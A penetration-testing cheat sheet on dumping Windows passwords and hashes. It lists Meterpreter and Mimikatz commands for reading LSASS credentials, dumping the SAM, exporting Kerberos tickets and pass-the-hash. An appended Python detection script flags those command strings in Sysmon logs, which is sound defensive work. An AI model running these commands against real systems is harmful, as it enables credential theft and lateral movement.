# Dump passwords and hashes


## Meterpreter (remote)

- Execute Meterpreter as local administrator

```
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
meterpreter > getsystem
meterpreter > run post/windows/gather/hashdump

meterpreter > load mimikatz

meterpreter > msv
meterpreter > kerberos

meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a 'full'
meterpreter > mimikatz_command -f samdump::hashes
```


## Mimikatz (local)

- Download Mimikatz from https://github.com/gentilkiwi/mimikatz/releases
- Execute Mimikatz as local administrator

```
mimikatz # privilege::debug

mimikatz # sekurlsa::msv
mimikatz # sekurlsa::kerberos

mimikatz # sekurlsa::logonpasswords
mimikatz # token::whoami
mimikatz # token::elevate
mimikatz # lsadump::sam

mimikatz # sekurlsa::tickets /export
mimikatz # sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm> /run:cmd
```
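
Added example, not part of the original page: a detection-side check that flags the Mimikatz `module::command` strings listed above when they show up in process-creation command lines. The events are constructed samples using Sysmon Event ID 1 field names, and the rule names are hypothetical labels.

```python
import re

# Rules built from the Mimikatz module::command strings listed on this page.
# Rule names are hypothetical labels chosen for this example.
RULES = {
    "debug-privilege": re.compile(r"\bprivilege::debug\b", re.I),
    "lsass-credential-read": re.compile(
        r"\bsekurlsa::(msv|kerberos|logonpasswords|tickets)\b", re.I),
    "sam-dump": re.compile(r"\b(lsadump::sam|samdump::hashes)\b", re.I),
    "token-elevation": re.compile(r"\btoken::elevate\b", re.I),
    "pass-the-hash": re.compile(r"\bsekurlsa::pth\b.*?/ntlm:", re.I),
}


def classify(command_line):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))


def scan(events):
    """Return (computer, image, rules) for each event with at least one match."""
    hits = []
    for ev in events:
        rules = classify(ev.get("CommandLine", ""))
        if rules:
            hits.append((ev["Computer"], ev["Image"], rules))
    return hits


# Constructed sample events using Sysmon Event ID 1 field names; not real telemetry.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Computer": "WS01", "Image": r"C:\Temp\mimikatz.exe",
     "CommandLine": 'mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" exit'},
    {"Computer": "WS02", "Image": r"C:\Temp\mimikatz.exe",
     "CommandLine": 'mimikatz.exe "sekurlsa::pth /user:<user> /domain:<domain> '
                    '/ntlm:<ntlm> /run:cmd"'},
    {"Computer": "WS03", "Image": r"C:\Temp\mimikatz.exe",
     "CommandLine": 'mimikatz.exe "token::elevate" "lsadump::sam" exit'},
]

if __name__ == "__main__":
    for computer, image, rules in scan(SAMPLE_EVENTS):
        print(f"{computer}  {image}  {', '.join(rules)}")
```

Command-line matching only sees commands passed as process arguments. Commands typed at the interactive `mimikatz #` prompt or run through the Meterpreter extension do not appear in process-creation logs, so pair this check with monitoring of process access to `lsass.exe`.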
